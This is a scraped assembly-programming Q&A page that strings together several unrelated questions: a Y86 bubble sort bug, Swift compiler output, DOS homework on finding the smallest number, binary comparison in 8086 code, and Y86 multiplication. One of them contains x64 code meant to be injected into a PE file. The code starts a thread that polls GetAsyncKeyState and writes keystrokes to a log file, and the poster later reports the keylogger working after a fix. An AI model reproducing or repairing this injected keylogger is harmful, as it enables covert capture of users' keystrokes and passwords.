Here is the Y86 code for reference
.pos 0
irmovq stack, %rsp # initialize stack pointer
call main
halt
.align 8
input_array:
.quad 6
.quad 4
.quad 5
.quad 2
.quad 3
.quad 1
count:
.quad 6
main:
irmovq input_array, %rdi
irmovq count, %rsi
mrmovq (%rsi), %rsi
call bubble_sort
ret
# bubble_sort(long *data, long count)
bubble_sort:
irmovq $1, %rcx
subq %rcx, %rsi # last = count - 1
irmovq $8, %r14 # %r14 = sizeof(int*)
rrmovq %rdi, %r13 # %r13 = data
outer_loop:
rrmovq %r13, %rdi # data = data (param)
irmovq $0, %rbx # i = 0
inner_loop:
mrmovq (%rdi), %r9 # %r9 = data[i]
addq %r14, %rdi # data += 1
mrmovq (%rdi), %r10 # %r10 = data[i + 1]
if_statement:
rrmovq %r9, %r11
subq %r10, %r11 # %r11 = data[i] - data[i + 1]
jg then # if data[i] > data[i + 1], goto then
jmp end_if
then:
rrmovq %r10, %r11 # temp = data[i + 1]
rmmovq %r9, (%rdi) # data[i + 1] = data[i]
rmmovq %r11, -8(%rdi) # data[i] = temp
end_if:
addq %rcx, %rbx # i++
rrmovq %rbx, %rax # %rax = i
subq %rsi, %rax # %rax = i - last
jl inner_loop # goto inner_loop if i < last
subq %rcx, %rsi # last--
jg outer_loop # goto outer_loop if last > 0
ret
.pos 0x100
stack:
For reference, I'm using this Y86-64 simulator. The problem occurs after the first sequence of inner loops is completed. The register value in %rsi is 4 and I have just substracted 1 from %rsi's previous value just before the jg instruction is processed, but it still doesn't jump to outer_loop.
Related
I have the following Swift 4 code:
_ = self.tenArguments(one: 1, two: 2, three: 3, four: 4,
five: 5, six: 6, seven: 7, eight: 8,
nine: 9, ten: 10)
This compiles to:
0x100003247 <+87>: mov edx, 0x1
0x10000324c <+92>: mov edi, edx
0x10000324e <+94>: mov edx, 0x2
0x100003253 <+99>: mov esi, edx
0x100003255 <+101>: mov edx, 0x3
0x10000325a <+106>: mov r8d, 0x4
0x100003260 <+112>: mov ecx, r8d
0x100003263 <+115>: mov r8d, 0x5
0x100003269 <+121>: mov r9d, 0x6
0x10000326f <+127>: mov r10d, 0x7
0x100003275 <+133>: mov eax, r10d
0x100003278 <+136>: mov r10d, 0x8
0x10000327e <+142>: mov r11d, r10d
0x100003281 <+145>: mov r10d, 0x9
0x100003287 <+151>: mov ebx, r10d
0x10000328a <+154>: mov r10d, 0xa
0x100003290 <+160>: mov r14d, r10d
0x100003293 <+163>: mov r15, qword ptr [rip + 0x6dd6] ; (void *)0x00000001003a4048: swift_isaMask 0x10000329a <+170>: mov r12, qword ptr [rbp - 0x48]
I know x86_64 calling convention is RDI,RSI,RDX,RCX,R8,R9 but can anybody explain why the code above? Why is 0x1 loaded to edx first then moved to edi? This is then repeated for 0x2 to esi. Why has the compiler not generated:
mov edi, 0x1
mov esi, 0x2 ; etc...etc...
etc. Is this a speed optimisation by the compiler? Why double the number of ops?
This code was built by Xcode 8.3.2 for iPhone 7 simulator.
I am trying to inject this code in a PE file to run my program with CreateThread to run a keylogger in an PE file but CreateThread fails with 3E6h ERROR_NOACCESS error.
Where is my eerror in my source code below?
procedure:
sub rsp, 28h
and rsp, 0fffffffffffffff0h
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress
lea rcx, [user32dll]
call rax
lea rdx, [createthread7]
lea rcx, [kernel32dll]
call MyGetProcAddress
lea rbx,[pThread] ;
lea rbx,[ThreadId]
mov qword[rsp+20h], rbx
lea r9,[Par]
lea r8,[KL]
xor rdx,rdx
lea rcx,[SECURITY_ATTRIBUTES_]
call rax
add rsp, 28h
db 0 ;JMP PARA OEP
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
proc KL
REPS:
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress
lea rcx, [user32dll]
call rax
lea rdx, [getasync]
lea rcx, [user32dll]
call MyGetProcAddress
MOV [GETKEYS],RAX
Label001:
mov [VIRTUAL_KEY_CODE],8
L0:
cmp [VIRTUAL_KEY_CODE],255
ja La1
mov rcx,[VIRTUAL_KEY_CODE]
MOV RAX,[GETKEYS]
call rax
cmp eax,-32767
MOV RAX,[GETKEYS]
jz Label1
inc [VIRTUAL_KEY_CODE]
jmp L0
La1:
mov [VIRTUAL_KEY_CODE],8
jmp Label001
Label1:
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress
lea rcx, [msvcrtdll]
call rax
lea rdx, [fopen7]
lea rcx,[msvcrtdll]
call MyGetProcAddress
lea r8, [filemode]
lea rdx, [file_name]
lea rcx,[fp]
call rax ;TO LOG KEYSTROKES
lea rdx, [fwrite7]
lea rcx,[msvcrtdll]
call MyGetProcAddress
mov r9,[fp]
mov r8,1
mov rdx,1
lea rcx, [VIRTUAL_KEY_CODE]
call rax ;TO LOG KEYSTROKES
lea rdx, [fclose7]
lea rcx,[msvcrtdll]
call MyGetProcAddress
mov rcx,[fp]
call rax
jmp REPS
endp
proc MyGetProcAddress
...
ret
endp
kernel32dll db 'KERNEL32.DLL', 0
loadlibrary7 db 'loadlibraryA', 0
user32dll db 'USER32.DLL', 0
createthread7 db 'CreateThread', 0
msvcrtdll db 'MSVCRT.DLL', 0
getasync db 'GetAsyncKeyState', 0
fopen7 db 'fopen_s', 0
fwrite7 db 'fwrite',0
fclose7 db 'fclose',0
exitproc7 db 'ExitProcess', 0
filemode db 'a',0
file_name db 'log',0
pThread dq 0
struct SECURITY_ATTRIBUTES
A dd 0
B dq 0
C dd 0
ends
SECURITY_ATTRIBUTES_ SECURITY_ATTRIBUTES
GEYKEYS dq 0
VIRTUAL_KEY_CODE dq 0
fp dq 0
Par dq 0
...
I already initialize my source:
mov qword[rsp+20h], 0
lea rbx,[ThreadId]
mov qword[rsp+28h], rbx
lea r9,[Par]
lea r8,[KL]
xor rdx,rdx
lea rcx,[SECURITY_ATTRIBUTES_]
call rax
And now my keylogger is working perfectly. Thank you for help me.
I had made a code that display the largest but then my teacher ask us to make another one that input 3 numbers and display the smallest value.
here is the code:
org 100h
jmp start
msg1 db 10,13,"Enter first number: $"
msg2 db 10,13,"Enter second number: $"
msg3 db 10,13,"Enter third Number: $"
num1 db ?
num2 db ?
num3 db ?
start:
lea dx, msg1
mov ah, 9
int 21h
mov ah, 1
int 21h
mov num1, al
lea dx, msg2
mov ah, 9
int 21h
mov ah, 1
int 21h
mov num2, al
lea dx, msg3
mov ah, 9
int 21h
mov ah, 1
int 21h
mov num3, al
mov bl, num1
cmp bl, num2
jng number2
cmp bl, num3
jng number3
mov ah, 2
mov dl, num1
int 21h
jmp escape
number2:
mov bl, num2
cmp bl, num3
jng number3
mov ah, 2
mov dl, num2
jmp escape
number3:
mov ah, 2
mov dl, num3
int 21h
escape:
ret
sample output:
1st no. i enter 3
2nd no, i enter 2
3rd no, i enter 1
and the largest is 3 but the output will be 13 because i don't know how to put space on my code :D...
Pls help!!! XD Also it's my first time posting this... so sorry for my bad grammar ty.
mov ah, 2
mov dl, num2
jmp escape
In this part your program forgot to actually call DOS with int 21h.
i don't know how to put space on my code
Just use the following everywhere you need some space between outputs on the same line:
mov ah, 2
mov dl, " "
int 21h
Or put items on different lines using:
mov ah, 2
mov dl, 10
int 21h
mov dl, 13
int 21h
A nicer solution would be to display a suitable message before outputting the number:
msg4 db 10,13,"Smallest value: $"
...
lea dx, msg4
mov ah, 9
int 21h
my teacher ask us to make another one that input 3 numbers and display the smallest value.
Simply change all of those jng (jump on not greater) instructions by the jnl (jump on not less) instruction.
This is a slightly better version of your code and using jnl:
mov bl, num1
cmp bl, num2
jnl number2
cmp bl, num3
jnl number3
mov dl, num1
jmp Print
number2:
mov bl, num2
cmp bl, num3
jnl number3
mov dl, num2
jmp Print
number3:
mov dl, num3
Print:
mov ah, 2
int 21h
ret
Good luck monday!
My task is to compare two numbers in ASM. I input the first number (binary) and the second (binary). I must compare Z1 and Z2. If Z1>=Z2, show TRUE, else show FALSE
dane segment
txt1 db 'First number: $'
txt2 db 'Secend number: $'
z1 dw 0
z2 dw 0
prawda db 'True!$'
falsz db 'False!$'
dane ends
sts segment stack
db 256 dup(?)
sts ends
program segment
assume cs:program, ss:sts, ds:dane
start:
mov ax, seg dane
mov ds,ax
mov dx, offset txt1
mov ah, 9
int 21h
mov cx, 16
mov bx, offset z1
petla1:
mov ah, 1
int 21h
mov [bx], al
inc bx
loop petla1
mov cx, 16
mov ax, 0
mov bx, offset z1
petla2:
shl ax, 1
mov dl, [bx]
cmp dl, 31h
jne dal1
add ax, 1
dal1:
inc bx
loop petla2
mov dx, offset txt2
mov ah, 9
int 21h
mov cx, 16
mov bx, offset z1
petla3:
mov ah, 1
int 21h
mov [bx], al
inc bx
loop petla3
mov cx, 16
mov ax, 0
mov bx, offset z1
petla4:
shl ax, 1
mov dl, [bx]
cmp dl, 31h
jne dal2
add ax, 1
dal2:
inc bx
loop petla4
;JGE, >= JNL not <
mov ax, [z1]
mov bx, [z2]
cmp ax,bx
jge ety
mov ah, 9
mov dx, offset falsz
int 21h
jae koniec
ety:
mov ah,9
mov dx, offset prawda
int 21h
koniec:
mov ah, 4ch
int 21h
program ends
end start
What I do wrong? It's my first assembler project
mov cx, 16
mov bx, offset z1
petla1:
mov ah, 1
int 21h
mov [bx], al
inc bx
loop petla1
You didn't reserve the necessary memory for this operation! Z1 is defined as a word (2 bytes) and you are writing 16 bytes in this loop.
If you want to keep the basic structure of your program add the definition of a 16 byte buffer to recieve the binary representation of the number.
Buffer db 16 dup(0)
mov cx, 16
mov bx, offset Buffer
petla1:
mov ah, 1
int 21h
mov [bx], al
inc bx
loop petla1
mov cx, 16
mov ax, 0
mov bx, offset Buffer
petla2:
shl ax, 1
mov dl, [bx]
cmp dl, 31h
jne dal1
add ax, 1
dal1:
inc bx
loop petla2
mov [z1], ax
Do it similarly for the second number using the same Buffer but storing AX in z2.
Please note that the jae koniec should be an unconditional jump. jmp koniec
.pos 0x200
.align 4
InputArray:
.long 5
.long 10
Done: .long 0x0
.pos 0x400
.align 4
OutputArray:
.pos 0x0
irmovl InputArray,%eax
irmovl OutputArray, %esi
Loop:
mrmovl (%eax), %ecx # get first element from InputArray
mrmovl (%eax), %edi # a copy of first element used for multiplication
irmovl $4, %ebx # increment the pointer of InputArray
addl %ebx, %eax
mrmovl (%eax), %edx # get second element from InputArray
irmovl $1, %ebx # add first element to its copy for the amount of second element
subl %ebx, %edx
jg mult
rmmovl %ecx,(%esi) # output value to OutputArray
mult:
addl %edi, %ecx
subl %ebx, %edx
jg mult
Exit: halt
This is a really simple program that does unsigned mutiplication of a pair of integers (5 times 10) I wrote for Y86.
When I run the code, the result looks like this:
Stopped in 38 steps at PC = 0x42. Status 'HLT', CC Z=1 S=0 O=0
Changes to registers:
%eax: 0x00000000 0x00000204
%ecx: 0x00000000 0x00000032
%ebx: 0x00000000 0x00000001
%esi: 0x00000000 0x00000400
%edi: 0x00000000 0x00000005
Changes to memory:
The register ecx for the result of calculation is 32 in hex so I definitely know that the mult loop has performed as intended, but nothing is being output into OutputArray which I don't understand why.
I am not sure if I understand what you mean by "No code is supposed to be after a jump statement in a label and the correct alternative was to locate the subsequent code in another label and use another jump statement to invoke that label", but the problem with your code is that you forgot a ret statement in your Mult loop.
Also, your code terminated ungracefully once you were done with the Loop part of the code (you ran through the Mult loop code again before encountering the halt.)
The following code works (but note that it is not ideal -- among other things, it does not account for negative values and overflow):
.pos 0x200
.align 4
InputArray:
.long 5
.long 10
Done: .long 0x0
.pos 0x400
.align 4
OutputArray:
.pos 0x0
irmovl InputArray,%eax
irmovl OutputArray, %esi
Loop:
mrmovl (%eax), %ecx # get first element from InputArray
mrmovl (%eax), %edi # a copy of first element used for multiplication
irmovl $4, %ebx # increment the pointer of InputArray
addl %ebx, %eax
mrmovl (%eax), %edx # get second element from InputArray
irmovl $1, %ebx # add first element to its copy for the amount of second element
subl %ebx, %edx
jg mult
rmmovl %ecx,(%esi) # output value to OutputArray
jmp Exit
mult:
addl %edi, %ecx
subl %ebx, %edx
jg mult
ret
Exit: halt